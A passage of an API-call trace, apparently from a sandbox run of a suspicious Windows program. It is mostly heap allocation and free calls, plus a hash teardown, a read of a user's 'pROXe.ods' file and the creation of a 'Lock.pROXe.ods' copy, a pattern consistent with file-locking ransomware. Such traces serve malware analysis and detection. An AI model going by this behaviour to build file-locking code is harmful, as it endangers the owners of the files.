hHeap=0x970000) returned 1 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0236.542] CryptDestroyHash (hHash=0xa87510) returned 1 [0236.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0236.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0236.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0236.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0236.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0236.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0236.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0236.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0236.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0236.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0236.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0236.544] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0236.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0236.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0236.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0236.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0236.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0236.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0236.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0236.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0236.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0236.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0236.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0236.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0236.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0236.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0236.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0236.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0236.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0236.602] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0236.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0236.602] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0236.602] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0236.602] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0236.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0236.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0236.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0236.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0236.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0236.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0236.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0236.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0236.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0236.603] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/pROXe.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\proxe.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0236.604] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.604] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0236.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0236.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0236.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0236.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0236.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0236.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0236.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0236.604] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0236.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0236.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0236.604] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0236.604] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0236.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0236.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0236.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0236.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0236.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0236.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0236.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0236.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0236.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0236.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0236.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0236.605] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0236.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0236.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0236.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0236.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0236.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0236.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0236.609] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.pROXe.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.proxe.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0236.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0236.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0236.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0236.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0236.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0236.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0236.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0236.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0236.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0236.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0236.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0236.679] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0236.679] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0236.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0236.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0236.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0236.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0236.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0236.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0236.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0236.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0236.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0236.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0236.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0236.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0236.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0236.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0236.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 